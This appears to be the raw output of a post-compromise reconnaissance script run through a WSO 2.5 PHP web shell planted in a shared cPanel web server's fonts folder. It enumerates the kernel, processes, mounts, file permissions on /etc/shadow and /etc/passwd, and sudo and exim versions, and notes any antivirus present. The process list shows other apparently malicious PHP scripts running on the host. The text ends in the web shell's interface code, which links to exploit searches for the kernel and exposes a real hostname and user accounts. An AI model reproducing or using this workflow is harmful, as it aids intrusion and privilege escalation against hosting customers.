**************************************************
* general information *
* *
**************************************************
[+]id:
uid=522(ohrankac) gid=521(ohrankac) groups=521(ohrankac)
[+]uanme -a:
Linux box15.economhost.com 2.6.32-042stab049.6 #1 SMP Mon Feb 6 19:17:43 MSK 2012 x86_64 x86_64 x86_64 GNU/Linux
[+]cat /proc/version:
Linux version 2.6.32-042stab049.6 (root@rh6-build-x64) (gcc version 4.4.4 20100726 (Red Hat 4.4.4-13) (GCC) ) #1 SMP Mon Feb 6 19:17:43 MSK 2012
[+]cat /proc/cpuinfo:
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 1600.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5613.29
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 1
cpu cores : 4
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.58
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 2
cpu cores : 4
apicid : 4
initial apicid : 4
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.58
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 3
cpu cores : 4
apicid : 6
initial apicid : 6
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.58
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 0
cpu cores : 4
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.57
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 1
cpu cores : 4
apicid : 3
initial apicid : 3
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.57
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 2
cpu cores : 4
apicid : 5
initial apicid : 5
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5612.58
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Core(TM) i7 CPU 930 @ 2.80GHz
stepping : 5
cpu MHz : 2800.000
cache size : 8192 KB
physical id : 0
siblings : 8
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida dts tpr_shadow vnmi flexpriority ept vpid
bogomips : 5724.83
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:
[+]cat /etc/issue:
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
[+]cat /etc/issue.net:
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
Redhat Release: CentOS release 6.2 (Final)
[+]who online (w):
16:58:14 up 193 days, 6:20, 0 users, load average: 0.39, 0.36, 0.28
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+]proccess list wide tree (ps axfuw):
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19220 384 ? Ss May02 1:52 init
root 2 0.0 0.0 0 0 ? S May02 0:00 [kthreadd/101]
root 3 0.0 0.0 0 0 ? S May02 0:00 \_ [khelper/101]
root 144 0.0 0.0 10652 4 ? S<s May02 0:00 /sbin/udevd -d
root 666 0.0 0.0 183160 1332 ? Sl May02 23:36 /sbin/rsyslogd -i /var/run/syslogd.pid -c 4
root 707 0.0 0.0 6676 348 ? Ss May02 5:42 /usr/sbin/vnstatd -d
root 716 0.0 0.0 64048 308 ? Ss May02 9:45 /usr/sbin/sshd
root 891 0.0 0.1 82984 9156 ? Ss May02 11:35 /usr/local/apache/bin/httpd -k start -DSSL
nobody 17859 0.0 0.0 83184 7840 ? S Nov03 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 18754 0.0 0.1 135848 12360 ? S Nov03 0:08 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 17862 0.0 0.1 83060 8448 ? S Nov03 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 18801 0.0 0.1 135848 12380 ? S Nov03 0:08 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 18510 0.0 0.0 82916 7608 ? S Nov03 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 18696 0.0 0.1 135848 12584 ? S Nov03 0:08 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 19899 0.0 0.1 83060 8656 ? S Nov03 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 23638 0.0 0.1 135848 12368 ? S Nov03 0:08 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 27225 0.0 0.1 83060 8908 ? S Nov03 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 28486 0.0 0.1 135848 12404 ? S Nov03 0:08 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 19137 0.0 0.0 83052 8156 ? S Nov04 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 20693 0.0 0.1 135848 12392 ? S Nov04 0:07 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 19157 0.0 0.0 83052 8072 ? S Nov04 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 21688 0.0 0.1 135848 12392 ? S Nov04 0:07 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 19166 0.0 0.1 83188 8264 ? S Nov04 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 20803 0.0 0.1 135848 12608 ? S Nov04 0:07 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 20703 0.0 0.0 82920 7876 ? S Nov04 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 20731 0.0 0.1 135848 12700 ? S Nov04 0:07 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 21700 0.0 0.1 83060 8924 ? S Nov04 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 25830 0.0 0.1 135848 12688 ? S Nov04 0:07 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 8949 0.0 0.0 83048 8040 ? S Nov05 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 9077 0.0 0.1 135848 12384 ? S Nov05 0:06 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 27055 0.0 0.1 83420 8456 ? S Nov06 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 28135 0.0 0.1 135848 12440 ? S Nov06 0:05 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 15789 0.0 0.1 83152 8392 ? S Nov07 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 16318 0.0 0.1 135848 12380 ? S Nov07 0:04 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 15844 0.0 0.1 83156 8708 ? S Nov07 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 16255 0.0 0.1 135848 12608 ? S Nov07 0:04 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 15858 0.0 0.1 83156 8356 ? S Nov07 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 16248 0.0 0.1 135848 12524 ? S Nov07 0:04 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 16152 0.0 0.1 83148 8664 ? S Nov07 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 17312 0.0 0.1 135848 12392 ? S Nov07 0:04 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 16316 0.0 0.1 83152 9180 ? S Nov07 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 17350 0.0 0.1 135848 12388 ? S Nov07 0:04 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 24265 0.0 0.1 83256 8408 ? S Nov08 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 25512 0.0 0.1 135848 12796 ? S Nov08 0:03 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 24773 0.0 0.1 83120 8380 ? S Nov08 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 25443 0.0 0.1 135848 12392 ? S Nov08 0:03 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 26631 0.0 0.1 83252 8424 ? S Nov10 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 28120 0.0 0.1 135848 12668 ? S Nov10 0:01 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 26665 0.0 0.1 83120 8372 ? S Nov10 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 27078 0.0 0.1 135848 12388 ? S Nov10 0:01 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 27266 0.0 0.1 83272 9264 ? S Nov10 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 31784 0.0 0.1 135848 12440 ? S Nov10 0:01 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 1803 0.0 0.1 83252 8800 ? S Nov10 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 4633 0.0 0.1 135848 12392 ? S Nov10 0:01 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 9685 0.0 0.1 83260 9328 ? S 03:08 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 11225 0.0 0.1 135848 12400 ? S 03:30 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 9686 0.0 0.1 83252 9584 ? S 03:08 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 11252 0.0 0.1 135848 12388 ? S 03:31 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 10813 0.0 0.1 83260 8420 ? S 03:23 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 11179 0.0 0.1 135848 12388 ? S 03:29 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 14690 0.0 0.1 83124 8376 ? S 04:34 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 14862 0.0 0.1 135848 12396 ? S 04:39 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 16815 0.0 0.1 83412 9612 ? S 05:05 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 19132 0.0 0.1 135848 12396 ? S 05:57 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
nobody 16841 0.0 0.1 83392 9592 ? S 05:06 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 19078 0.0 0.1 135848 12396 ? S 05:56 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/wp-content/plugins/wp_add/cache/index.php
root 18303 0.0 0.1 50656 8780 ? S 16:05 0:00 \_ /usr/local/cpanel/3rdparty/bin/perl /usr/local/cpanel/bin/leechprotect
root 18309 0.0 0.0 82968 6444 ? S 16:05 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 20551 0.0 0.1 83392 9636 ? S 16:38 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 20653 0.0 0.1 83256 9328 ? S 16:39 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 20764 0.0 0.1 83124 8400 ? S 16:41 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 21932 0.0 0.1 83124 8372 ? S 16:52 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
xalq 22423 0.0 0.1 137128 14064 ? S 16:57 0:00 | \_ /usr/bin/php /home/xalq/public_html/errorencounteri/7c334.php
nobody 21933 0.0 0.1 83124 8336 ? S 16:52 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 22253 0.0 0.1 83124 8380 ? S 16:54 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 22282 0.0 0.1 83124 8376 ? S 16:54 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 22320 0.0 0.1 83124 8364 ? S 16:55 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
ohrankac 22505 39.0 0.1 137116 15336 ? S 16:58 0:00 | \_ /usr/bin/php /home/ohrankac/public_html/fonts/eccbc8.php
ohrankac 22506 0.0 0.0 11296 1300 ? S 16:58 0:00 | \_ sh -c sh script.sh 2>&1 > res.txt
ohrankac 22507 0.0 0.0 11300 1380 ? S 16:58 0:00 | \_ sh script.sh
ohrankac 22516 0.0 0.0 13500 1096 ? R 16:58 0:00 | \_ ps axfuw
nobody 22321 0.0 0.1 83124 8376 ? S 16:55 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 22397 0.0 0.1 83124 8328 ? S 16:56 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
nobody 22399 0.0 0.1 83124 8264 ? S 16:56 0:00 \_ /usr/local/apache/bin/httpd -k start -DSSL
xalq 22489 0.3 0.1 137128 14048 ? S 16:58 0:00 \_ /usr/bin/php /home/xalq/public_html/errorencounteri/7c334.php
root 931 0.0 0.0 117228 784 ? Ss May02 2:51 crond
root 941 0.0 0.0 21436 264 ? Ss May02 0:00 /usr/sbin/atd
root 30166 0.0 0.0 11304 8 ? S Jul02 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-file=/var/lib/mysql/box15.economhost.com.pid
mysql 27965 11.8 0.9 4310916 75364 ? Sl Oct12 5206:10 \_ /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --log-error=/var/lib/mysql/box15.economhost.com.err --open-files-limit=3050 --pid-file=/var/lib/mysql/box15.economhost.com.pid
root 10016 0.0 0.2 97860 18376 ? S Nov07 0:07 cpsrvd (SSL) - waiting for c --llu=1383772967 --listen=3,4,5,6,7,8,9
named 10974 0.0 0.4 703620 37492 ? Ssl Nov07 0:29 /usr/sbin/named -u named
root 19646 0.0 0.0 138624 1932 ? Ss Nov07 0:00 pure-ftpd (SERVER)
root 19648 0.0 0.0 39276 1656 ? S Nov07 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/local/cpanel/bin/pureauth
root 22056 0.0 0.0 19552 980 ? Ss Nov07 0:01 /usr/sbin/dovecot
dovenull 22086 0.0 0.0 41912 3104 ? S Nov07 0:00 \_ dovecot/pop3-login
dovenull 22087 0.0 0.0 42020 3220 ? S Nov07 0:00 \_ dovecot/pop3-login
dovenull 22088 0.0 0.0 42072 3536 ? S Nov07 0:00 \_ dovecot/imap-login
dovenull 22089 0.0 0.0 42552 4036 ? S Nov07 0:07 \_ dovecot/imap-login
dovecot 22090 0.0 0.0 13256 1132 ? S Nov07 0:00 \_ dovecot/anvil
root 22091 0.0 0.0 13388 1384 ? S Nov07 0:00 \_ dovecot/log
root 22093 0.0 0.0 16368 2132 ? S Nov07 0:01 \_ dovecot/config
voice 2597 0.0 0.0 22992 2104 ? S Nov09 0:00 \_ dovecot/imap
voice 20226 0.0 0.0 23220 2412 ? S 16:30 0:00 \_ dovecot/imap
voice 20430 0.0 0.0 22992 2108 ? S 16:35 0:00 \_ dovecot/imap
voice 20468 0.0 0.0 23212 2424 ? S 16:36 0:00 \_ dovecot/imap
voice 22030 0.0 0.0 22992 2104 ? S 16:53 0:00 \_ dovecot/imap
voice 22160 0.0 0.0 23212 2424 ? S 16:54 0:00 \_ dovecot/imap
root 22358 0.0 0.0 19076 1456 ? S 16:55 0:00 \_ dovecot/ssl-params
mailnull 22077 0.0 0.0 69340 3092 ? Ss Nov07 0:04 /usr/sbin/exim -bd -q60m
root 22103 0.0 0.6 166156 52272 ? Ss Nov07 0:31 /usr/local/cpanel/3rdparty/perl/514/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid --max-children=3 --max-spare=1
root 22126 0.0 0.6 166156 50268 ? S Nov07 0:00 \_ spamd child
root 28779 0.0 0.0 33308 5664 ? S Nov07 0:01 queueprocd - wait to process a task
root 28849 0.0 0.1 49608 11380 ? S Nov07 1:03 tailwatchd
root 28871 0.0 0.1 102204 14768 ? S Nov07 0:00 cpdavd - accepting connections on 2077 and 2078
root 28874 0.0 0.0 27032 2984 ? SN Nov07 0:00 cpanellogd - sleeping for logs
[+]mount:
/dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev type devtmpfs (rw,relatime)
none on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
tmpfs on /tmp type tmpfs (rw,nosuid,noexec,relatime)
tmpfs on /var/tmp type tmpfs (rw,nosuid,noexec,relatime)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[+]df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 500G 31G 470G 7% /
none 3.9G 4.0K 3.9G 1% /dev
tmpfs 3.9G 1020K 3.9G 1% /tmp
tmpfs 3.9G 0 3.9G 0% /var/tmp
[+]cat /etc/fstab
none /dev/pts devpts rw 0 0
tmpfs /tmp tmpfs noexec,nosuid 0 0
tmpfs /var/tmp tmpfs noexec,nosuid 0 0
**************************************************
* security fails *
* *
**************************************************
[+]mmap_min_addr:
4096
[+]Parse /etc for Writeable files
[+] check /etc/shadow PERM
--w------- 1 root root 3.9K Nov 7 04:19 /etc/shadow
[+] check /etc/passwd PERM
-rw-r--r-- 1 root root 3.6K Nov 7 04:19 /etc/passwd
[+]FHS root (ls -lha /):
total 92K
drwxr-xr-x 22 root root 4.0K Nov 8 02:00 .
drwxr-xr-x 22 root root 4.0K Nov 8 02:00 ..
-rw-r--r-- 1 root root 0 May 2 2013 .autofsck
lrwxrwxrwx 1 root root 39 Nov 7 04:19 aquota.group -> /proc/vz/vzaquota/00000015/aquota.group
lrwxrwxrwx 1 root root 38 Nov 7 04:19 aquota.user -> /proc/vz/vzaquota/00000015/aquota.user
drwxr-xr-x 2 root root 4.0K Nov 8 02:00 backup
dr-xr-xr-x 2 root root 4.0K Nov 7 04:21 bin
dr-xr-xr-x 3 root root 4.0K Sep 13 2011 boot
drwxrwxrwt 8 root root 2.1K Nov 10 03:09 dev
drwxr-xr-x 74 root root 12K Nov 11 16:54 etc
drwx--x--x 31 root root 4.0K Nov 7 04:20 home
dr-xr-xr-x 9 root root 4.0K Aug 16 2012 lib
dr-xr-xr-x 8 root root 12K Dec 18 2012 lib64
drwxr-xr-x 2 root root 4.0K Nov 11 2010 media
drwxr-xr-x 2 root root 4.0K Nov 11 2010 mnt
drwxr-xr-x 12 root root 4.0K Mar 16 2013 opt
dr-xr-xr-x 151 root root 0 May 2 2013 proc
-rw-r--r-- 1 root root 109 Nov 7 04:19 razor-agent.log
dr-xr-x--- 19 root root 4.0K Nov 11 03:47 root
dr-xr-xr-x 2 root root 4.0K Aug 16 2012 sbin
lrwxrwxrwx 1 root root 25 Sep 29 2011 scripts -> /usr/local/cpanel/scripts
drwxr-xr-x 2 root root 4.0K Nov 11 2010 selinux
drwxr-xr-x 2 root root 4.0K Nov 11 2010 srv
drwxr-xr-x 6 root root 0 May 2 2013 sys
drwxrwxrwt 3 root root 6.9K Nov 11 16:58 tmp
drwxr-xr-x 14 root root 4.0K Sep 29 2011 usr
drwxr-xr-x 21 root root 4.0K Nov 7 03:46 var
lrwxrwxrwx 1 root root 18 Sep 29 2011 vzaquota -> /proc/vz/vzaquota/
[+]Search core dumps...
Sudo version 1.7.4p5
Exim version 4.80.1 #2 built 17-Oct-2013 11:04:37
**************************************************
* av, firewalls *
* *
**************************************************
chkrootkit:
rkhunter:
clamav:
**************************************************
* Usefull *
* *
**************************************************
[+] Python
[+] Php
X-Powered-By: PHP/5.2.17
Content-type: text/html
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>ohranka.com - WSO 2.5</title><style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:300px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style><script> var c_ = '/home/ohrankac/public_html/fonts/';
var a_ = 'FilesMan'
var charset_ = 'Windows-1251';
var p1_ = '';
var p2_ = '';
var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('/fonts/eccbc8.php', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); }</script><head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'><form method=post name=mf style='display:none;'><input type=hidden name=a><input type=hidden name=c><input type=hidden name=p1><input type=hidden name=p2><input type=hidden name=p3><input type=hidden name=charset></form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:<br>Drives:</span></td><td><nobr>Linux box15.economhost.com 2.6.32-042stab049.6 #1 SMP Mon Feb 6 19:17:43 MSK 2012 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+2.6.32" target=_blank>[exploit-db.com]</a></nobr><br>522 ( ohrankac ) <span>Group:</span> 521 ( ohrankac )<br>5.2.17 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 